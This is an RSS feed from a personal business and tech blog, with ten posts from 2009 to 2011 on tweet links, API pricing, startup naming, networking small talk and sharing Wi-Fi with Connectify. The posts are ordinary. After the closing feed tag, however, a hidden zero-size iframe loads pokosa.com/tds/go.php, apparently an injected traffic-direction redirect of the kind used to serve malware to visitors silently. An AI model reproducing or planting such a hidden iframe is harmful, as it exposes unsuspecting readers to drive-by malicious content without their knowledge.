<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>iSawToday - The Coolest Thing I Saw Today on the Web &#187; Business</title>
	<atom:link href="http://www.isawtoday.com/category/business/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.isawtoday.com</link>
	<description>Exciting posts from the world of technology, news, capitalism, and entertainment.</description>
	<lastBuildDate>Mon, 02 May 2011 22:21:48 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Set Tweet Status from a link</title>
		<link>http://www.isawtoday.com/set-tweet-status-from-a-link/</link>
		<comments>http://www.isawtoday.com/set-tweet-status-from-a-link/#comments</comments>
		<pubDate>Mon, 02 May 2011 22:21:48 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=188</guid>
		<description><![CDATA[My new company GroupHigh is holding it&#8217;s first webinar focused on building blog lists in several weeks.  Earlier today i was sending out email invitations in which I wanted to include a very quick and easy way for people to tweet about my event.  The result is  a great url string that looks like the [...]]]></description>
			<content:encoded><![CDATA[<p>My new company GroupHigh is holding it&#8217;s first webinar focused on building blog lists in several weeks.  Earlier today i was sending out email invitations in which I wanted to include a very quick and easy way for people to tweet about my event.  The result is  a great url string that looks like the following:</p>
<p>http://twitter.com/home?status=I&#8217;m%20attending%20the%20Building%20A%20Killer%20List%20of%20Blogs%20for%20Outreach%20Webinar http://bit.ly/k3dMNv</p>
<p>This string pre-populates the click-er&#8217;s status box with my message, and a link to signup for the webinar.</p>
<p>Here&#8217;s how I framed this in my email:</p>
<p>Let People Know&#8230; (you will be able to customize your message before sending)<br />
<a href="http://twitter.com/home?status=I'm%20attending%20the%20Building%20A%20Killer%20List%20of%20Blogs%20for%20Outreach%20Webinar http://bit.ly/k3dMNv">Tweet that you&#8217;re attending this event!</a></p>
<p>Cheers!</p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=188&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/set-tweet-status-from-a-link/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to price webservices</title>
		<link>http://www.isawtoday.com/how-to-price-webservices/</link>
		<comments>http://www.isawtoday.com/how-to-price-webservices/#comments</comments>
		<pubDate>Mon, 07 Feb 2011 20:57:51 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[api]]></category>
		<category><![CDATA[webservice pricing]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=175</guid>
		<description><![CDATA[Over at Recipebridge.com we&#8217;ve had webservices available to the public since our early days but I&#8217;ll be the first one to admit I&#8217;ve largely neglected them.  Sure I threw up the token documentation and the &#8216;request an api key&#8217; form but we&#8217;re not real good about getting users signed up.  Fast forward to last summer(2010) [...]]]></description>
			<content:encoded><![CDATA[<p>Over at Recipebridge.com we&#8217;ve had webservices available to the public since our early days but I&#8217;ll be the first one to admit I&#8217;ve largely neglected them.  Sure I threw up the token documentation and the &#8216;request an api key&#8217; form but we&#8217;re not real good about getting users signed up.  Fast forward to last summer(2010)  we had a large client approach us wanting to use our webservices in their new startup.  Jumping at the chance to earn revenue from something other than advertising I signed the deal and charged the client a lump-sum for access on an annual basis.</p>
<p>I&#8217;ve often lamented that pricing webservices seems troublesome, after all how valuable is your data?</p>
<p>Some example pricing plans for API&#8217;s and webservices that I&#8217;ve found:</p>
<ul>
<li><a href="http://www.whoisxmlapi.com/#/hosted_pricing.php?rid=2">WHOIS API</a></li>
<li><a href="http://developer.yolink.com/tiers">yolink api pricing</a></li>
<li><a href="http://www.mashupcamp.com/wiki/index.php/APIPricingModels">A great wiki on api pricing strategy</a></li>
</ul>
<p><strong>Monitoring and api management platforms. </strong></p>
<ul>
<li><a href="3scale.com">3scale</a></li>
<li><a href="http://apigee.com">apigee</a></li>
</ul>
<p>I&#8217;ve used both Apigee and 3scale.  3scale is much more powerful in that they handle all the authentication and metering of your api for you.  IE Create a plan and allow the user to run x hits per day/month/etc&#8230;</p>
<p>Apigee is closer to a google analytics for your api/giving you basis monitoring and stats.</p>
<p>In all, I&#8217;m about to open up API access to everyone who requests it at recipebridge.com and a pricing model similar to the WHOIS api (link above) fits quite nicely for now.</p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=175&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/how-to-price-webservices/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Using Social Media and Mobile Tools Correctly 101</title>
		<link>http://www.isawtoday.com/using-social-media-and-mobile-tools-correctly-101/</link>
		<comments>http://www.isawtoday.com/using-social-media-and-mobile-tools-correctly-101/#comments</comments>
		<pubDate>Tue, 31 Aug 2010 16:57:57 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Featured]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=168</guid>
		<description><![CDATA[While some of you might think my lack of writing is due to mourning the demise of LOST, it&#8217;s not.  It&#8217;s been a busy summer transitioning to a new role as the COO of an online sports game company and landing some big, new deals for RecipeBridge.
Aside from that mtn. biking, lots of tennis, and [...]]]></description>
			<content:encoded><![CDATA[<p>While some of you might think my lack of writing is due to mourning the demise of LOST, it&#8217;s not.  It&#8217;s been a busy summer transitioning to a new role as the COO of an online sports game company and landing some big, new deals for <a title="One search, millions of recipes." href="http://www.recipebridge.com/">RecipeBridge</a>.</p>
<p>Aside from that mtn. biking, lots of tennis, and sailing on Lake Michigan consume most of my time.  One of my good friends sent me a link that was just too awesome not to write about so here I am.</p>
<p><a href="http://www.Snow.com/">Snow.com</a> has created not only one of the most beautiful homepages I&#8217;ve seen recently but one that displays a video detailing how social, mobile, and web technologies can be combined to do something just flat-out awesome.</p>
<p>1. Identify a niche that has existing, natural community and apply technologies to compliment (not replace) typical mountain communication.  Have you ever been on the mountain and wondered where everyone else was?</p>
<p>2. Engage those a degree away from the primary community, lodgers, parents, and children. Businesses including mine, have so much going on we can barely engage one community let alone reach secondary networks.  This video shows how well-thought-out technology can make this a snap.  This video shows not only the skiers and boarders engaged but friends back in the lodge can locate and communicate with friends.  Parents can monitor their children on a dedicated children&#8217;s version of the site and on and on.</p>
<p>Check it out:</p>
<p><a href="http://www.snow.com/epicmix/home.aspx">http://www.snow.com/epicmix/home.aspx</a></p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=168&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/using-social-media-and-mobile-tools-correctly-101/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MIT &amp; Minority Report Technology</title>
		<link>http://www.isawtoday.com/mit-minority-report-technology/</link>
		<comments>http://www.isawtoday.com/mit-minority-report-technology/#comments</comments>
		<pubDate>Tue, 16 Mar 2010 20:00:38 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[My Interests]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=162</guid>
		<description><![CDATA[
g-speak overview 1828121108 from john underkoffler on Vimeo
]]></description>
			<content:encoded><![CDATA[<p><object width="400" height="225"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=2229299&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=2229299&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="225"></embed></object>
<p><a href="http://vimeo.com/2229299">g-speak overview 1828121108</a> from <a href="http://vimeo.com/user922585">john underkoffler</a> on <a href="http://vimeo.com">Vimeo</a></p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=162&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/mit-minority-report-technology/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Translate a word into multiple languages.</title>
		<link>http://www.isawtoday.com/translate-a-word-into-multiple-languages-at-once/</link>
		<comments>http://www.isawtoday.com/translate-a-word-into-multiple-languages-at-once/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 16:27:40 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=153</guid>
		<description><![CDATA[Being an entrepreneur one of the most challenging/time-consuming/energy-usurping tasks is finding a suitable name/domain for a company. Although it often starts out fun it gets frustrating very quickly as you realize every domain name under the sun is taken.

A good friend of mine named Dan has a solutio]]></description>
			<content:encoded><![CDATA[<p>Being an entrepreneur, one of the most challenging/time-consuming/energy-usurping tasks is finding a suitable name/domain for a company.   While the process starts out being fun frustration quickly sets in as you realize every domain name under the sun is taken.</p>
<p>A good friend of mine named Dan has a solution of this. He looks up relevant words in another language, hoping to find a pronounceable word with meaning and available domain.</p>
<p>This morning I turned to a similar approach for a new company.  Rather than run tens of queries at Google Translate I found this awesomely handy tool which looks up words in multiple languages: <a href="http://www.nicetranslator.com/">http://www.nicetranslator.com/</a> .</p>
<p>Combine that with the fastest domain lookup tool I&#8217;ve ever used at <a href="https://domize.com/">https://domize.com/</a> and finding foreign company names becomes much-less painful&#8230;. although I&#8217;m still searching.</p>
<p>How do you find company names and domains?</p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=153&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/translate-a-word-into-multiple-languages-at-once/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Chicago Entrepreneur and Groupon Founder Interview</title>
		<link>http://www.isawtoday.com/chicago-entrepreneur-and-groupon-founder-interview/</link>
		<comments>http://www.isawtoday.com/chicago-entrepreneur-and-groupon-founder-interview/#comments</comments>
		<pubDate>Tue, 23 Feb 2010 01:24:36 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=150</guid>
		<description><![CDATA[Here&#8217;s a great interview with another Midwest startup success.  Andrew Mason gives a great interview to Silicon Prairie News about the success and funding of GroupOn.com

]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s a great interview with another Midwest startup success.  Andrew Mason gives a great interview to Silicon Prairie News about the success and funding of GroupOn.com</p>
<p><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="437" height="265" id="viddler"><param name="movie" value="http://www.viddler.com/simple_on_site/33b3a8b0" /><param name="allowScriptAccess" value="always" /><param name="allowFullScreen" value="true" /><param name="flashvars" value="fake=1"/><embed src="http://www.viddler.com/simple_on_site/33b3a8b0" width="437" height="265" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" flashvars="fake=1" name="viddler" ></embed></object></p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=150&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/chicago-entrepreneur-and-groupon-founder-interview/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The perfect web startup idea</title>
		<link>http://www.isawtoday.com/the-perfect-web-startup-idea/</link>
		<comments>http://www.isawtoday.com/the-perfect-web-startup-idea/#comments</comments>
		<pubDate>Tue, 16 Feb 2010 22:17:11 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=147</guid>
		<description><![CDATA[Surrounded by entrepreneurs most days of the week I'm never short on ideas for the 'next great thing'.  The harder part is finding and vetting an idea that can make money and be successfully scaled.  I thought the following post on vetting web startup ideas from Ash was a great read.  This is something that I do more or less everyday but never in such an organized fashion.  He's got several great diagrams that describe the decision making process of going from idea to product and customer base.  ]]></description>
			<content:encoded><![CDATA[<p>Surrounded by entrepreneurs most days of the week I&#8217;m never short on ideas for the &#8216;next great thing&#8217;.  The harder part is finding and vetting an idea that can make money and be successfully scaled.  I thought the following post on <a href="http://www.ashmaurya.com/2010/02/customer-development-checklist-for-my-web-startup-part-1/">vetting web startup ideas</a> from Ash was a great read.  This is something that I do more or less everyday but never in such an organized fashion.  He&#8217;s got several great diagrams that describe the decision making process of going from idea to product and customer base.</p>
<p>Thanks for the great post Ash!</p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=147&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/the-perfect-web-startup-idea/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top 5 Holiday Small Talk Tactics</title>
		<link>http://www.isawtoday.com/holiday-small-talk-tactics/</link>
		<comments>http://www.isawtoday.com/holiday-small-talk-tactics/#comments</comments>
		<pubDate>Thu, 03 Dec 2009 22:09:25 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[My Interests]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=124</guid>
		<description><![CDATA[The holiday season is full of opportunities to network and meet/greet people so I decided to throw together a list of my top 5 small talk tactics:

Show up early &#8211; I did this by accident several weeks ago and had nothing to do but talk to the event organizers and help them rearrange the tables.  [...]]]></description>
			<content:encoded><![CDATA[<p>The holiday season is full of opportunities to network and meet/greet people so I decided to throw together a list of my top 5 small talk tactics:</p>
<ol>
<li><strong>Show up early</strong> &#8211; I did this by accident several weeks ago and had nothing to do but talk to the event organizers and help them rearrange the tables.  In return these two ladies made introductions for me throughout the evening.</li>
<li><strong>Use an exciting opening phrase</strong> &#8211; Rather than the traditional &#8220;How are you?&#8221; greeting, incorporate a phrase such as &#8220;What are you working on that&#8217;s new and exciting?&#8221;  or &#8220;What&#8217;s new and exciting?&#8221;  I&#8217;ve used this at tradeshows for several years now and it&#8217;s a great way of getting other people to open up.</li>
<li><strong>Give descriptive answers</strong> &#8211; Rather than answer the inevitable question <em>&#8220;What do you do?&#8221;</em> with <em>&#8220;work for a software company&#8221;</em>.   Try giving a more specific answer such as <em>&#8220;I  sell and market data mining software to insurance companies.&#8221; </em>Even though my example is tech-y I&#8217;ve given given my bogey the option of connecting on several fronts: software, sales &amp; marketing,  and insurance.</li>
<li><strong>Prepare</strong> &#8211; Formulate interesting answers to common questions that you know you will be asked. (apply #3)</li>
<li><strong>Recommend &amp; Refer</strong> &#8211; As you begin to meet people throughout the evening make recommendations and introductions between your new acquaintances.</li>
</ol>
<p>What&#8217;s your favorite small talk tactic?</p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=124&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/holiday-small-talk-tactics/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Getting Things Done (GTD) With Social Media</title>
		<link>http://www.isawtoday.com/getting-things-done-gtd-with-social-media/</link>
		<comments>http://www.isawtoday.com/getting-things-done-gtd-with-social-media/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 04:09:23 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Headline]]></category>
		<category><![CDATA[GTD Social Media]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/?p=110</guid>
		<description><![CDATA[*Shameless Plug Warning*
2 weeks ago I was asked to speak to 30 small business owners as part of an alumni event at the local college. Although everyone thought they were coming to hear about social media I felt some reality would be more beneficial than the typical SM hype so often pitched these days. I [...]]]></description>
			<content:encoded><![CDATA[<p>*Shameless Plug Warning*</p>
<p>2 weeks ago I was asked to speak to 30 small business owners as part of an alumni event at the local college. Although everyone thought they were coming to hear about social media I felt some reality would be more beneficial than the typical SM hype so often pitched these days. I reviewed each attendees online presence and decided to give them a GTD approach for things they could do to bolster their online presence.   Here is my presentation:</p>
<div id="__ss_2432291" style="width: 425px; text-align: left;"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" title="Getting Things Done With Social Media" href="http://www.slideshare.net/atheimer/getting-things-done-with-social-media">Getting Things Done With Social Media</a><object style="margin:0px" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=sm3110209-091105180242-phpapp02&amp;stripped_title=getting-things-done-with-social-media" /><param name="allowfullscreen" value="true" /><embed style="margin:0px" type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=sm3110209-091105180242-phpapp02&amp;stripped_title=getting-things-done-with-social-media" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<div style="font-size: 11px; font-family: tahoma,arial; height: 26px; padding-top: 2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/atheimer">atheimer</a>.</div>
</div>
<p>If you’re interested in learning more or would like to have me present to your group?  I always require a minimum fore-knowledge of the attendees so that I can adjust the GTD to-do&#8217;s appropriately for the group.</p>
<p>Feel free to email me via linkedin: http://www.linkedin.com/in/theimer</p>
<p>Testimonial:</p>
<p><em>&#8220;We invited Andy Theimer to speak at our Business to Business Networking Night on the topic of social media marketing, and we could not have been more pleased with his presentation.  Andy presented to a group of about 30 alumni on the topic, &#8220;Getting Things Done with Social Media,&#8221; and it was clear from his presentation that he had done research into the attendees, their websites and their businesses and incorporated an attentiveness to their specific situations into his presentation.  His presentation was energetic, clear and well-organized, and not only were attendees taking notes during the presentation, but they also asked lots of questions afterwards and kept Andy answering questions well past his presentation, and even the end time of the event! Thank you for recommending him to us.&#8221;</em></p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=110&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/getting-things-done-gtd-with-social-media/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>A Geeky Way To Pick Up Girls At Starbucks &#8211; Offer them free WIFI</title>
		<link>http://www.isawtoday.com/a-geeky-way-to-pick-up-girls-at-starbucks-offer-them-free-wifi/</link>
		<comments>http://www.isawtoday.com/a-geeky-way-to-pick-up-girls-at-starbucks-offer-them-free-wifi/#comments</comments>
		<pubDate>Wed, 11 Nov 2009 16:14:54 +0000</pubDate>
		<dc:creator>andy</dc:creator>
				<category><![CDATA[Business]]></category>

		<guid isPermaLink="false">http://www.isawtoday.com/a-geeky-way-to-pick-up-girls-at-starbucks-offer-them-free-wifi/</guid>
		<description><![CDATA[If you&#8217;ve ever struggled to think of a clever way to meet that professional woman sitting next to you at Starbucks I may have stumbled upon a solution for you, offer her free WIFI.
A new application from Connectify allows anyone with a Windows 7 computer to share their internet connection with the people around them.  [...]]]></description>
			<content:encoded><![CDATA[<p>If you&#8217;ve ever struggled to think of a clever way to meet that professional woman sitting next to you at Starbucks I may have stumbled upon a solution for you, offer her free WIFI.</p>
<p>A new application from Connectify allows anyone with a Windows 7 computer to share their internet connection with the people around them.  That&#8217;s right if you&#8217;re connected to a network you can hook your friends (and potentially new friends) up with no cost internet.</p>
<p>Here&#8217;s 4 quick steps to make it happen:</p>
<ul>
<li>Be running Windows 7, if you don&#8217;t have it already, go get it -it&#8217;s awesome!</li>
<li>Have the <a href="http://www.connectify.me/" title="Share Wifi connections">Connectify</a> application installed</li>
<li>Be connected to Starbuck&#8217;s wireless network.</li>
<li> Let the pretty girl two tables back know that she can connect to the Internet with the following details:</li>
<li>Connect to network:&lt;your name&gt;</li>
<li>Password: &lt;you phone number&gt;</li>
</ul>
<p>Let me know how it works!</p>
<img src="http://www.isawtoday.com/?ak_action=api_record_view&id=107&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.isawtoday.com/a-geeky-way-to-pick-up-girls-at-starbucks-offer-them-free-wifi/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
